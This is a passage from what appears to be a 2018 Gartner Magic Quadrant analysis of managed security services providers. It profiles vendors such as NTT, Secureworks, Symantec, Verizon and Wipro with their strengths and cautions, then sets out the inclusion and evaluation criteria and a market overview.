  • Buyers should carefully analyze the technology approach recommended to deliver MSSs (e.g., shared or dedicated QRadar, whether on-premises or hosted) to ensure that the approach is compatible with their IT environments, architectures and requirements.
  • IBM offers a managed EDR service that is used for real-time threat detection and threat hunting purposes, but it has little visibility with buyers.

NTT

NTT brings together the MSS-specific resources and delivery platforms of NTT Com Security, Solutionary, Dimension Data, NTT Communications, NTT DATA and technology from the NTT Innovation Institute. NTT Security has been established as the specialized security company of the NTT Group. NTT is headquartered in Tokyo, with regional headquarters for North America, Europe and the Asia/Pacific region. NTT offers a broad range of security professional services and integration and incident response services. NTT Security has 17 24/7 MSS SOCs globally: six in the Asia/Pacific region, five in Europe and six in North America. In 2017, NTT progressed toward integrating its three separate platforms used for delivering MSS. Its new operating model is similar in nature to a channel-based approach in that NTT Security doesn’t directly sell services, instead relying on its group companies, which have varying levels of coverage and support in the different geographies. NTT is actively migrating North American and Japan customers to its new Global Managed Security Services Platform (GMSSP), while EMEA and remaining Asia/Pacific region customers continue to use the existing WideAngle and ArcSight ESM-based platforms. NTT Security MSSs are sold via the NTT Group companies of Dimension Data, NTT Communications and NTT DATA.

Customers of NTT operating companies, and enterprises seeking a large global provider, should consider NTT for MSSs.

STRENGTHS
  • NTT can bundle MSS with a wide range of security service offerings and delivery options, including broader telecommunications and IT infrastructure service offerings.
  • NTT has the ability to serve a wide range of industries/verticals across geographies due to the NTT Group companies’ global presence.
  • The new NTT Security portal (GMSSP) has a good range of roles available, with some customization and self-service capabilities available to customers. Integrations with NTT Group companies and customers to the GMSSP are supported via a RESTful API.
  • NTT has moderate visibility with Gartner clients looking for discrete MSSs.
CAUTIONS
  • NTT Security has moved its security sales team to the NTT Group companies while the delivery of the service happens through NTT Security, which is a separate group. This may create misalignment between the sales/marketing and product management/engineering functions, and may create confusion for customers that wish to purchase MSS from NTT Security.
  • Many of NTT’s EMEA and Asia/Pacific region customers are still on their older portals and delivery platforms. MSS customers should get clarity from their NTT Group company provider regarding plans to migrate to the new portal without affecting service continuity and while maintaining service features.
  • While there is a managed EDR offering with Carbon Black, FireEye and CounterTack, NTT is behind some of its competitors in introducing advanced threat-detection-oriented services relative to threat hunting and network monitoring.

Orange Business Services

Orange Business Services (Orange), headquartered in Paris and with regional offices in a wide variety of locations across the Asia/Pacific region, North America and Europe, offers a broad range of telecommunications and cloud-based IT infrastructure services, security consulting services, and MSSs. Orange’s MSSs are delivered using commercial and proprietary technologies for log management, event correlation and advanced threat detection, as well as some wider integrations with open-source big data technologies. Security Event Intelligence is the service offering for 24/7 threat detection and response. Threat intelligence is centered around malicious IP/URL/domain names curated by Orange collected from a large number of public and private feeds and sources, discoveries made on the Orange Internet backbone, and intelligence from Orange’s in-house CERT team. Services are delivered from seven SOCs (three located in Europe, one in India, one in Malaysia, and one each in Mauritius and Egypt). All SOCs are 24/7 except for the European and Malaysia SOCs, which use a “follow the sun” model. Data residency requirements are addressed on a case-by-case basis, with a majority of non-European clients being serviced from the India and Egypt SOCs.

Orange’s network and infrastructure service customers and multinational organizations, especially those with a European and Asia/Pacific business focus, seeking network-security-focused MSSs should consider Orange Business Services.

STRENGTHS
  • Orange is experienced in integrating and operating global networking and IT services with MSS.
  • Security device management services are a strong focus for the vendor.
  • Orange has a good understanding of regulatory frameworks around data privacy and residency, and caters to many different standards, especially in the European region, with a focus on France.
  • Orange customers give above-average marks for vendor and service capability satisfaction.
CAUTIONS
  • The Orange MSS portal has less self-service functionality and usability than many of its competitors, and lags behind in granular user access and control, and reporting abilities. Orange has added enhanced portal functionality over the past 12 months, focusing on search and visualization capabilities.
  • Orange has less mature capabilities in providing advanced attack analytics as part of its MSS, with a focus on sandboxing and malware analysis rather than network or endpoint-based detection approaches.
  • Orange has limited market visibility with Gartner clients for discrete MSSs.

Secureworks

Secureworks offers a range of MSSs and other security-specific services to customers globally. Corporate headquarters are located in Atlanta, with offices in London, Edinburgh, Sydney and Tokyo. Services are delivered from three 24/7 SOCs in the U.S. (Atlanta; Chicago; and Providence, Rhode Island); one 24/7 SOC in Edinburgh, Scotland; and one 24/7 SOC in Kawasaki, Japan. The SOCs are supported by a center of excellence in Romania that is focused on customer device management and new service innovation. MSS delivery is through Secureworks’ proprietary Counter Threat Appliance (CTA) and Counter Threat Platform (CTP), which leverages a shared big data platform and advanced analytics capabilities. Customer access to services is via the Secureworks Client Portal. A range of commercial log sources from customer-deployed technologies are supported, in addition to leveraging commercial and proprietary tools for managed network and host-based threat monitoring. Host and network-based advanced threat detection are provided through Secureworks’ Advanced Endpoint Threat Detection (AETD) service (via its proprietary Red Cloak agent or Carbon Black) and its Advanced Malware Protection and Detection (AMPD; in partnership with Lastline) service. The Secureworks Counter Threat Unit research team provides threat research and threat intelligence, malware analysis, and analytics support to the provider’s SOCs. Additional services, such as vulnerability scanning (both customer- or Secureworks-managed) and advanced threat intelligence services are also available to buyers.

Midsize, enterprise and government organizations seeking an established MSS that leverages a consistent, shared delivery approach with a global presence, and a security-focused set of offerings, should, consider Secureworks.

STRENGTHS
  • Advanced threat detection services are available for endpoint, whether leveraging the proprietary Red Cloak agent or Carbon Black, via the AETD service, which includes the ability to isolate hosts (either by the customer or by Secureworks’ SOC). Customers leveraging Secureworks iSensor in IPS mode, or via Secureworks managed firewalls, can self-initiate blocking for threats detected by the SOC.
  • Native support for IaaS monitoring in AWS and Azure is available, and includes capabilities for network and web app vulnerability management, which supports buyers requiring visibility and security monitoring in public cloud environments.
  • Secureworks offers an incident response retainer that is popular with buyers, which provides proactive as well as remote and on-site reactive response services.
  • Secureworks is highly visible with Gartner clients, and is frequently included in competitive MSS deals by North America-based midsize and enterprise buyers. It also has good visibility with U.K. buyers.
  • Gartner customers give positive feedback for Secureworks’ MSS offerings.
CAUTIONS
  • Secureworks lacks visibility with buyers in continental Europe and the Asia/Pacific region for MSSs.
  • Customers requiring raw event log retention (e.g., for compliance reporting and incident investigation purposes beyond 90 days) can opt for Secureworks’ on-premises log management offering (LogVault).
  • Monitoring for Office 365 and Salesforce is supported, but support for other popular SaaS solutions like Box, Dropbox and Workday are not yet available. There is no CASB option available.
  • Basic response services are available to AETD and device management customers, but other response services like forensics support, including malware analysis and threat hunting, require adding premium services.

Symantec

Symantec is headquartered in Mountain View, California, and has six SOCs: one each in the U.S., the U.K. and Japan, and three in the Asia/Pacific region (India, Australia and Singapore). The SOCs operate on a follow-the-sun model to provide 24/7 support. Customers are assigned to a primary SOC in their region along with a global team of analysts aligned to their specific industry vertical. Symantec’s Cyber Security Services offerings include security monitoring and management, including hosted log retention, security intelligence, incident response services and security skills development services. Symantec has a broad portfolio of security technology solutions. Recent acquisitions include Outlier Security (EDR), Skycure (mobile device protection), and Fireglass (isolation technology). Symantec’s MSS SOC technology platform is based on self-developed technology. Customer event and log data are analyzed by Symantec’s global SOCs and retained in the North American data center. Symantec meets data residency requirements through contractual arrangements and the EU Standard Model Clause. Symantec MSS supports advanced threat detection via integrations with its own solutions as well as third-party products for network monitoring and forensics capabilities, and for payload analysis. MSS monitoring of EDR and forensics tools is offered for Symantec and third-party products. Incident and breach response services are available on retainer or on an ad hoc basis to buyers looking for a single provider for MSSs and response services. Monitoring capabilities are available for popular SaaS, IaaS and public cloud services. Pricing for MSS is offered in two models: based on a per-device/event source cost or on an enterprisewide license that provides unlimited monitoring up to a set limit of event sources (aka nodes).

Enterprises seeking an established MSSP with a global presence should consider Symantec.

STRENGTHS
  • Symantec has a well-established threat intelligence capability via its DeepSight services.
  • Symantec’s MSS portal offers granular role definitions and strong support for tracking and managing incident workflow.
  • The enterprisewide pricing model offers larger customers flexibility in bringing security event sources into scope for monitoring, and avoids change orders to add event sources beneath the agreed-on total for monitoring.
  • MSS customers indicate that Symantec is effective in detecting and helping to respond to advanced threats and targeted attacks.
  • Symantec has good visibility for MSS among Gartner customers.
CAUTIONS
  • Symantec primarily focuses on security monitoring now and directly offers limited device management services, primarily for IDPS, and not for other security controls. Prospective customers seeking device management services in addition to monitoring must anticipate working with Symantec partners.
  • Current integrations with vulnerability scanning products do not enable MSS customers to schedule or run scans via Symantec’s MSS portal. Customers can view scan results in the portal.
  • Symantec’s MDR-type advanced threat detection offerings, one network-based and the other host-based, are in the limited pilot/early adopter phase. Buyers interested in using one of these services will need to validate when they are available in their geography.

Trustwave

Trustwave, a stand-alone business within Singtel Group Enterprise, is based in Chicago, with regional headquarters in London, Sao Paulo and Sydney. Trustwave has several partnerships with regional telecommunications and service providers (e.g., Rogers Communications in Canada, Optus in Australia, Globe Telecom in the Philippines and TIS in Japan) around the globe to provide MSSs to those partners’ customer bases. Trustwave has nine 24/7 SOCs around the globe — three in North America, two in Europe (Warsaw and London), and four in the Asia/Pacific region (Manila, Philippines; Singapore; Sydney; and Tokyo). In the case of its telecom partners, the 24/7 SOCs are operated by Trustwave, some of which are in colocated facilities with the partners. Trustwave has a large portfolio of security technologies — including SIEM, UTM, network access control, application security, WAF and anti-malware — and builds MSSs around those, as well as support for a variety of third-party security products. Threat intelligence and incident response services are provided in-house from the Trustwave SpiderLabs team. Trustwave offers a managed EDR service leveraging Carbon Black and CounterTack as partners. Midmarket and small enterprise organizations, especially those with PCI DSS compliance requirements, make up the majority of Trustwave customers; however, the vendor has increased its focus on large enterprise buyers.

Telecommunications customers that have formed strategic partnerships with Trustwave, as well as companies in the retail, hospitality, healthcare and banking vertical industries, should consider Trustwave for MSSs. Trustwave is a good option for customers that need both products and services from a single provider, as the vendor has several competitive security software- and hardware-based platforms.

STRENGTHS
  • Trustwave supports a large client base that spans small and midsize enterprises, as well as larger global organizations.
  • Trustwave has expanded its global footprint through strategic partnerships with communications service providers across the Asia/Pacific region and North America, implementing a customer- and vertical-centric delivery model across the newly established SOCs.
  • The vendor’s SpiderLabs’ security research, penetration testing activities and incident response teams provide threat intelligence that enhances the value of the MSSs both through integration of the threat intelligence data directly into monitoring workflow and the SpiderLabs’ analysts serving as a higher tier of skills for advanced triage.
  • Trustwave has moderate visibility with Gartner clients looking to purchase MSSs.
CAUTIONS
  • Trustwave is planning to release an update to its MSS portal. Customers coming on board should ensure that they are getting the new portal, and that they review the rollout plan and features for that portal to ensure that it does not affect their service continuity.
  • As Trustwave continues to add support for third-party security technologies, customers should validate when and to what extent the security products they have deployed will be fully supported by Trustwave MSSs.
  • Direct support for Office 365 and Salesforce is supported via APIs; however, support for other popular SaaS vendors requires the use of a CASB solution. Trustwave claims that support for other SaaS vendors is available via API integrations, but it requires sufficient lead time (up to 45 days) for development and implementation.

Verizon

Verizon is a telecommunications company headquartered in Basking Ridge, New Jersey, with regional offices in Reading, U.K., and Singapore, which offers MSSs and security consulting services. Verizon uses a global network of SOCs, with three SOCs in the U.S., four in the Asia/Pacific region (India and Australia), and two in Europe (Luxembourg and Germany). Verizon’s Unified Security Portal (USP) provides single portal access across all services and capabilities for customers. Verizon’s MSS platform includes log management capabilities allowing clients to search, index and store logs using technology based on Elasticsearch. A mix of proprietary and commercial technology including Splunk is used to analyze security data, which is ingested via Verizon’s proprietary Log Event Collector (LEC). Verizon uses regional SOCs and data retention to meet requirements for local data storage and analysis. Network Threat Advanced Analytics, which was added as a service in 2017, is available to both customers on the Verizon backbone network and also through NetFlow analysis capabilities deployed on a customer’s site. Malware analysis and network and endpoint forensics are available to buyers. Remote and on-site support for incident and breach response is provided via the Threat Intel and Response Service.

Enterprises, including existing Verizon network customers, should consider Verizon if they require well-established global or region-specific MSSs.

STRENGTHS
  • Verizon’s investment in reporting, communications features and data visualization enables clients to fully manage, interpret and investigate their security incidents within Verizon’s Unified Security Portal.
  • Netskope and Cisco Cloudlock, two leading CASB solutions, are currently supported by Verizon. Buyers with SaaS monitoring requirements should confirm support for their preferred CASB vendor.
  • Verizon has moderate visibility with Gartner clients for MSSs.
CAUTIONS
  • Verizon’s pricing model, specifically for the MSS Analytics service, is based on the data volume of log event and other data sources sent per day, measured in GB per day (management of security devices is still priced on a per-device basis). Buyers considering Verizon services should carefully analyze how much event and data volume they currently generate, and may generate, over time, to properly scope the service costs.
  • Vulnerability management in Verizon’s Unified Security Portal lags behind many competing MSSPs. Buyers should validate how Verizon integrates and leverages the data from their preferred vulnerability management solution.
  • Verizon lags behind competitors in its managed EDR service offerings. Leading EPP vendors are supported, but EDR-specific technologies are not yet supported.

Wipro

Wipro provides a variety of MSSs, including security threat monitoring, infrastructure security operations and technology management, vulnerability management, incident response, identity and access management, and security consulting services. Wipro is headquartered in Bangalore, India, with offices in London, New York, New Jersey and elsewhere around the globe. MSSs are delivered from 14 24/7 SOCs, with eight in India (Bangalore, Pune, Chennai, Mysore, Bhubaneswar, Kochi, Noida and Gurgaon), two in Europe (Amsterdam and Meerbush, Germany), and four in North America (Houston, Dallas, Phoenix and Edmonton, Canada). Wipro offers security event monitoring via its multitenant ServiceNXT platform, or Wipro can support customers that bring their own SIEM solution or require a specific, dedicated SIEM tool. Wipro currently supports six SIEM platforms. Customers access the Wipro MSSs through the Cyber Defense Center (CDC) portal, which provides a single landing page for accessing services used by customers. Wipro has a broad portfolio of technology partnerships available to buyers. Flexible options are also available to meet local or regional data residency requirements and regulations.

Buyers across Europe, the Americas and the Asia/Pacific region considering MSS as part of broader IT outsourcing activities, and enterprises seeking flexible options for managing a range of security controls, including SIEM tools, across a variety of IT environments, should consider Wipro.

STRENGTHS
  • Wipro makes newer technologies such as EDR, NTA and SOAR available to buyers and customers (as well as for use internally for service delivery where applicable). Wipro made additional strategic investments in 2017 (Demisto) to complement existing investments (Vectra and IntSights). Wipro plans to introduce services leveraging breach and attack simulation, as well as deception solutions, in the future.
  • Wipro has extensive partnerships across a range of security technologies that it can implement, and manage, and can use those tools on behalf of buyers to meet their specific or customized requirements.
  • Wipro’s MSS delivery approach is highly customizable to customers’ requirements and existing technology solutions.
  • Wipro customers report positive feedback for the vendor’s overall services and experience, but the feedback for the onboarding process is less positive.
CAUTIONS
  • Wipro is in the process of moving its primary delivery model to a shared, multitenant platform, instead of leveraging customer-specific SIEM tools as its default delivery model. That transition to the shared model is still a work in progress and delivery models still lean toward per-customer-specified SIEM solutions. Buyers preferring to leverage a shared delivery platform should evaluate the architecture and implementation to ensure that it is fit for their purposes and requirements.
  • Wipro has made many improvements to its CDC portal over the past 12 months toward usability and centralization of access to services, but it still lacks the features available in many competing MSS portals.
  • Wipro has low visibility with Gartner clients’ shortlists for stand-alone MSS deals.

Vendors Added and Dropped

We review and adjust our inclusion criteria for Magic Quadrants as markets change. As a result of these adjustments, the mix of vendors in any Magic Quadrant may change over time. A vendor’s appearance in a Magic Quadrant one year and not the next does not necessarily indicate that we have changed our opinion of that vendor. It may be a reflection of a change in the market and, therefore, changed evaluation criteria, or of a change of focus by that vendor.

Added

Capgemini, DXC Technology and Fujitsu were added.

Dropped

CSC and HPE Enterprise Services were dropped, as they merged under DXC Technology.

Inclusion and Exclusion Criteria

As a remote service, MSS can be delivered to and from any location with sufficient connectivity. MSSPs that have operations in one geographic region can support customers in other regions. Gartner sees a distinct preference among customers seeking MSSs to first consider MSSPs with a presence in their country or region (e.g., North America, Europe and the Asia/Pacific region). For global enterprises, that includes a presence in multiple regions where the enterprises operate, in order to provide more local support. Local presence enables the MSSP’s ability to keep some data in specific regions, as well as to provide local business hours and access to advanced support, staffing requirements (such as specific citizenship) and local language support, among other capabilities. In addition, compliance with data residency and privacy regulations can be addressed in many cases with local operations centers.

This Magic Quadrant includes MSSPs that have met thresholds for scale (expressed as devices supported and customers) and presence (SOCs) in multiple regions, as well as a threshold for MSS revenue.

The criteria include a threshold for the number of firewalls or network-based IDPS devices under monitoring or management, and a threshold for the number of MSS customers — both distributed across multiple regions. We note that many providers, in addition to MSSs, offer other service delivery options (such as local staff augmentation) and related services, like building SOCs at a customer’s premises, which may be supported remotely by the MSSP’s SOC. However, these are not evaluated within this research. Also excluded from this analysis are service providers that offer MSSs only as a component of another service offering (such as bandwidth or hosting), and vendors that provide MSSs only for their own technologies, not for third-party technologies.

Inclusion Criteria

Vendors must:

  • Have services to remotely monitor and/or manage firewalls and UTM systems, IDPS devices from multiple vendors via discrete service offerings, and shared-service delivery resources.
  • Have firewalls/IDPS devices under remote management or monitoring for external customers that meet a minimum threshold described below.
  • Have customers, as well as monitored firewalls and IDPS devices, across multiple geographies that meet a minimum threshold described below. The thresholds for customers and devices have increased from the prior Magic Quadrant to reflect market growth.
  • Have MSS revenue of $50 million or more in 2016. The threshold for revenue has increased from the prior Magic Quadrant.
  • Have a SOC presence in multiple geographic regions.
  • Have reference accounts that are relevant to Gartner clients in the appropriate geographic regions.
  • Be service providers that Gartner determines to be significant vendors in the market because of their market presence or service innovation.

Inclusion thresholds for firewalls/IDPS devices under MSSs are 389 in the Asia/Pacific region, 2,473 in Europe, 3,709 in North America and 45 in the rest of the world (ROW). MSSPs must meet the thresholds in one of the following combinations:

  • Asia/Pacific and Europe
  • North America and the ROW
  • Asia/Pacific and North America
  • Europe and North America

Inclusion thresholds for MSS clients are 75 in the Asia/Pacific region, 118 in Europe, 355 in North America and 19 in the ROW. MSSPs must meet the thresholds in one of the following combinations:

  • Asia/Pacific and Europe
  • North America and the ROW
  • Asia/Pacific and North America
  • Europe and North America

Exclusion Criteria

Vendors that have:

  • Service offerings that are available only to end users that buy other non-MSSs
  • Services that monitor or manage only the service provider’s own technology
  • Services delivered by service provider resources dedicated to a single customer
  • Services that fail to meet the inclusion criteria

Evaluation Criteria

Ability to Execute

Product/Service refers to the service capabilities in areas such as information and log management; security event management; threat detection, monitoring and alerting; incident management and response; workflow; reporting; and service levels.

Overall Viability (Business Unit, Financial, Strategy, Organization) includes an assessment of the organization’s overall financial health, as well as the financial and practical success of the business unit. Includes the likelihood of the organization to continue to offer and invest in the product as well as the product position in the current portfolio.

Sales Execution/Pricing evaluates the service provider’s success in the MSSP market and its capabilities in presales activities. This also includes MSS revenue, pricing and the overall effectiveness of the sales channel. The level of interest from Gartner clients is also considered.

Market Responsiveness/Record evaluates the match of the MSS offering to the functional requirements stated by buyers at time of acquisition. It also evaluates the MSSP’s track record in delivering new functions when the market needs them.

Marketing Execution is an evaluation of the service provider’s ability to effectively communicate the value and competitive differentiation of its MSS offering to its target buyer.

Customer Experience evaluates the service delivery to customers. The evaluation includes ease of deployment, the quality and effectiveness of monitoring and alerting, and reporting and problem resolution. This criterion is assessed by surveys of vendor-provided reference customers, Gartner’s Peer Insights solution as well as by feedback from Gartner clients that are using an MSSP’s services, or have completed competitive evaluations of the MSSP’s offerings.

Operations covers the MSSP’s service delivery resources, such as infrastructure, staffing and operations reviews, or certifications.

Table 1.   Ability to Execute Evaluation Criteria

Evaluation Criteria

Weighting

Product or Service

High

Overall Viability

Medium

Sales Execution/Pricing

Medium

Market Responsiveness/Record

High

Marketing Execution

Medium

Customer Experience

High

Operations

Medium

Source: Gartner (February 2018)

Completeness of Vision

Market Understanding involves the MSSP’s ability to understand buyers’ needs and to translate them into services. MSSPs that show the highest degree of market understanding are adapting to customer requirements for specific functional areas and service delivery options. MSSPs with market-leading vision are investing in expertise and technology to monitor and analyze the external threat environment to better understand the sources, motives, targets and methods of attackers.

They are using that insight to improve the effectiveness of their MSS. They are also developing and introducing services that support large-scale data collection; advanced analytics, including statistical and behavioral functions; and monitoring of new data sources, such as endpoint, network and user to include in analysis. The goal of these capabilities is to more effectively find and respond to attacks, both broad-based and advanced targeted-type attacks.

Marketing Strategy evaluates clear, differentiated messaging consistently communicated internally, and externalized through social media, advertising, customer programs and positioning statements, and is tailored to the specific client drivers and market conditions in the MSS market.

Sales Strategy evaluates the strategy for selling that uses the appropriate networks, including direct and indirect sales, marketing, service, and communication, as well as partners that extend the scope and depth of market reach, expertise, technologies, services and their customer base.

Offering (Product) Strategy evaluates the provider’s approach to product development and delivery that emphasizes functionality and delivery options as they map to current and emerging requirements for MSSs. Development plans are also evaluated.

Vertical/Industry Strategy evaluates the strategy to direct resources (sales, product and development), skills and products to meet the specific needs of individual market segments, including verticals.

Innovation refers to the service provider’s strategy and ability to develop new MSS capabilities and delivery models to uniquely meet critical customer requirements. Examples include the capabilities described in Market Understanding.

Geographic Strategy addresses the vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries, as appropriate for that geography and market.

Table 2.   Completeness of Vision Evaluation Criteria

Evaluation Criteria

Weighting

Market Understanding

High

Marketing Strategy

Medium

Sales Strategy

Medium

Offering (Product) Strategy

High

Business Model

Not Rated

Vertical/Industry Strategy

Medium

Innovation

High

Geographic Strategy

Medium

Source: Gartner (February 2018)

Quadrant Descriptions

Leaders

Each of the service providers in the Leaders quadrant has significant mind share among organizations looking to buy MSSs as a discrete offering. These providers typically receive positive reports on service and performance from Gartner clients. MSSPs in the Leaders quadrant are typically appropriate options for enterprises requiring comprehensive portal-based access for interfacing with the service (e.g., responding to alerts, incident management, workflow, reporting, asset and access management, and managing other procured services, like vulnerability management) along with interaction with the MSSP for analyst expertise and advice.

Challengers

In the Challengers quadrant, Gartner customers are more likely to encounter MSSs that are offered as components of an IT or network service provider’s (NSP’s) other telecommunications, outsourcing or consulting services. Although an MSS is not a leading service offering for this type of vendor, MSSs in these markets tend to have a strong Ability to Execute and offer buyers capabilities when procuring services from a single provider aligns with the organizations’ IT strategy.

Visionaries

Companies in the Visionaries quadrant have demonstrated the ability to turn a strong focus on managed security into high-quality service offerings for the MSS market. These service providers are often strong contenders for enterprises that require access to and support for “cutting edge” technology, flexible service delivery options and strong customer service. MSSPs in the Visionaries quadrant have less market coverage and fewer resources or service options compared with vendors in the Leaders quadrant.

Niche Players

Niche Players are characterized by service offerings that are available primarily in specific market segments, or primarily as part of other service offerings. These service providers often tailor MSS offerings to specific requirements of the markets they serve. This quadrant is also characterized by providers that are newer, or have expanded beyond local and regional markets, to the global MSS market, and are maturing their delivery capabilities and offerings.

Context

Prospective MSS buyers with threat management use cases should highly weight MSSPs’ threat research, security intelligence and threat detection capabilities.

Prospective MSS users should require a proof of concept (POC), or a demonstration of MSS offerings, to validate ease of use, effectiveness and value. Current MSS customers should leverage POCs for new offerings from their existing MSSP before purchasing.

Current and prospective MSS users should validate MSSPs’ services to address advanced attacks via network behavior, network forensics, payload analysis, endpoint behavior and endpoint forensics, or consider MDR providers that specialize in such attack detection capabilities.

Global coverage matters to global enterprises. The MSS market includes a wide range of providers available only in a single region or country. If your organization is not global and wants good local support and presence, then carefully evaluate a global MSSPs ability to “look local.”

Market Overview

The MSS market is a mature one, offering buyers a variety of options from a diverse set of providers that generally align to a core focus. MSS is provided by pure-play security providers, IT system integrators and outsourcers, and network services providers. Buyers leverage MSSPs to address requirements that include 24/7 monitoring and threat detection, security technology management, and meeting a variety of compliance requirements. The preferred approach is to leverage a shared-service model where resources and support are remotely delivered by the provider. These may be complemented by related drivers, such as access to deeper or broader security expertise than is available in-house given the industry concern about the lack of available security resources and expertise, and the ability to retain those resources, or the need to redirect existing internal resources to other higher-value security functions inside the organization. Gartner clients interested in MSSs are increasingly looking for providers with effective threat detection capabilities that can detect both broad-based as well as advanced threats, and offer incident response services that may extend all the way through to the containment and remediation of a threat, either remotely or through physical on-site support.

This Magic Quadrant reflects the requirements of customers with service needs in multiple geographic regions. MSSPs included in the evaluation meet the minimum thresholds for MSS delivery in two or more regions via in-region SOCs. MSSPs with a multiregional presence typically have a sufficient understanding of region-specific customer requirements, as well as sufficient service delivery capabilities that can scale to support global service delivery. Customers with a mix of global delivery requirements and local regulatory requirements related to, for example, data privacy, may require customized services.

MSSPs that do not meet the criteria for inclusion in this Magic Quadrant may still deliver high-quality services within a continental or geographic region or regions. When considering MSSs, Gartner customers should develop evaluation criteria that meet their specific requirements, and take geography (language, local resources, etc.) into account, where applicable.

Market trends, which are discussed in more detail below, include:

  • Moving beyond monitoring of only network-based security technologies, particularly the network perimeter, with increasing focus on the endpoint (e.g., managed EDR services)
  • Increasing movement toward more customized outcomes for buyers
  • Buyer demand for capabilities to monitoring popular SaaS applications, and public cloud services providers and IaaS

The MSS market is growing at a healthy double-digit rate — in 2016, the market grew 10% to reach $9.4 billion in revenue (see“Market Share Analysis: Managed Security Services, Worldwide, 2016” ), and Gartner expects this growth rate to be in the 15% to 17% range for 2017. The MSS market constitutes approximately 60% of the overall security outsourcing market that will generate $18.7 billion revenue in 2017, growing at a CAGR of 11% through 2021. It is important to view MSS in the context of broader security outsourcing, because large enterprises are increasingly looking for hybrid engagements that include a mix of shared and dedicated service delivery components.

Demand for MSSs, from enterprises and midsize organizations, is driven primarily by a variety of factors:

  • Security staffing challenges and budget shortages: Gartner sees organizations of all sizes and geographies continuing to be challenged to attract and afford the appropriate security and risk management staff (see “Adapt Your Traditional Staffing Practices for Cybersecurity” ). Also, in an increasingly hostile external threat environment (see “How to Respond to the 2018 Threat Landscape” ), Gartner security and risk management leaders continue to report a lack of sufficient funding and increasing budget pressures that affect their security monitoring and operations capabilities.
  • Midsize enterprise adoption of detection and response capabilities: Midsize organizations are embracing detection and response capabilities to complement their investments in preventive security controls. These organizations are also impacted by the increasing scarcity (or affordability) of security operations talent. These organizations are looking for MSSPs to act as extensions of their security staff, instead of adding security head count. MSSPs can provide these services on a 24/7 basis, allowing customers to devote their often scarce internal security resources to higher-value activities.
  • Customized requirements: There is an increasing segmentation of the MSS market between providers that focus on a shared-service approach where offerings are homogenously applied across customers with minimal, if any, room for customization. These are generally the purview of the pure-play MSSPs. The IT outsourcers (ITOs) and NSPs that have MSS offerings are increasingly focused on providing customized solutions to larger enterprises in order to meet very specific requirements. These typically revolve around support for a wide range of security technologies, especially more “learn forward” technologies that the organization has already, or plans to, deploy, but lacks the expertise and skills to run and use those tools. The increasing demand for SOC build-outs in specific regions (e.g., Middle East and India) is also fueling the demand for customized services where MSS capabilities may be leveraged, like providing remote, out-of-business-hours support to complement the on-site provider’s staff manning the provider-run, customer-specific SOC.
  • First-time/early-cycle MSS customers: The MSS market is still attracting buyers. In both mature and emerging regions, there are organizations that are in their first cycle of building out threat detection and response capabilities. MSS forms a critical part of this because these organizations typically have low organizational competency in security and operate using lean security teams, and are therefore looking for opportunities to outsource security event monitoring, alerting and response. These “first cycle” MSS adopters are driving significant growth for the market.
  • Evolving compliance reporting requirements: Requirements such as GDPR (see “GDPR Clarity: 19 Frequently Asked Questions Answered” ) as well as corporate governance policies, are directly driving stronger requirements for threat monitoring, identification and incident response capabilities. As formal compliance regimes become more stringent or more pervasive, organizations are turning to external service providers to address the need to meet compliance requirements.
  • Expansion of security event monitoring into new domains: As organizations adopt cloud services (e.g., SaaS and IaaS predominantly), concerns about the lack of visibility into these environments from a security and risk management perspective are increasing. Customers considering MSS for security services are asking about MSSP capabilities for monitoring these environments.

MSS customers and buyers continue to express dissatisfaction with MSS providers, although they represent the minority. Some of the common reasons for customers switching MSSPs or opting for another delivery model include a lack of perceived value versus the costs for MSSs, providers that fail to detect threats or generate a high-level of false positives, and poor quality of service delivery and support during critical incidents. In particular, security and risk management leaders have increasing expectations that their MSSP will act as extensions of their security capabilities or teams to provide incident investigation and response support. These organizations are not resourced to consume just Tier 1 security operations capabilities where they only receive notifications of an incident and are expected to perform their own incident triage and investigation. That may be appropriate for large enterprises with adequately resourced security teams that want, and can, maintain responsibilities for incident triage, investigation and response.

Alternatives to using an MSSP include:

  • Managed detection and response services: Organizations have been increasingly looking for threat-detection-oriented service providers that offer more turnkey monitoring services coupled with higher-touch services. MDR service providers (see “Market Guide for Managed Detection and Response Services” ) are gaining increasing attention with buyers, particularly in the midsize and smaller enterprises. However, adoption by larger enterprises to augment existing capabilities, especially for advanced threat detection, is also occurring. Many MSSPs have introduced MDR-like services that are turnkey offerings using dedicated technology providers as premium services, but these are primarily focused on advanced threat detection use cases, usually via managed EDR or threat hunting. The use of network technologies for MDR-type services is starting to emerge. Gartner anticipates this trend to continue as MSSPs race to compete with the MDR providers.
  • Remote co-management of a customers’ SIEM solution: Increasingly, buyers across the midsize and larger enterprises are purchasing SIEM solutions, but looking for specific service providers to assist. Services available to the buyer range from engineering, tuning and performance monitoring of the customer’s SIEM tool, whether it’s on-premises, hosted by a provider or SaaS SIEM (see “Selecting and Deploying SaaS SIEM for Security Monitoring” ), all the way to complete management and 24/7 monitoring and alerting (in effect being an MSS to the customer, just using the customer’s technology). Buyers purchase their own SIEM tools for a variety of reasons (see “How and When to Use Co-managed Security Information and Event Management” ). In response to this trend, MSSPs are increasingly adding co-managed SIEM support for two to three SIEM solutions.
  • Organizations building their own, dedicated SOCs: Organizations decide to build and operate their own SOCs because they:
    • Desire more control over their detection and response technologies (either driven internally or due to regulatory requirements)
    • Require better access to their own data (for threat investigations or compliance purposes)
    • Have unique or specialized use cases or environments where more customized correlation/analytics is required (e.g., OT security monitoring requirements).
    • May be unaware of the concept of shared MSS, particularly because providers do not offer it to them. This is particularly true in emerging markets.
  • To adapt to these requirements, MSSPs are adding or expanding customized services to customers for SOC build-outs (see“How to Plan, Design, Operate and Evolve a SOC” ).

Challenges to using an MSSP include:

  • Ability to deliver “integrated” incident response: MSS buyers should be aware when considering these services as most MSSPs still have limitations and barriers between the basic triage and customer notification of a potential incident, and specific incident response activities, such as collecting suspect binaries and performing analysis, which is then used to ascertain the type of threat, sophistication, attribution and scope of distribution inside an organization. Many MSSPs have incident response retainers that are required to be purchased by a customer in order to have access to these types of technical incident response functions and experts.
  • Data residency and other privacy requirements: Regulatory requirements regarding movement of and access to specific types of data may limit the scope of monitoring enterprises entrusted to MSSPs. For example, GDPR may drive more stringent requirements for MSSPs depending on the geography in which the MSS buyer operates.
  • Change in strategy to reduce outsourcing: At the enterprise level or within the security organization, a change in strategy (sometimes driven by changes in leadership) regarding the use of external services can mean that MSSs are not considered effective options.
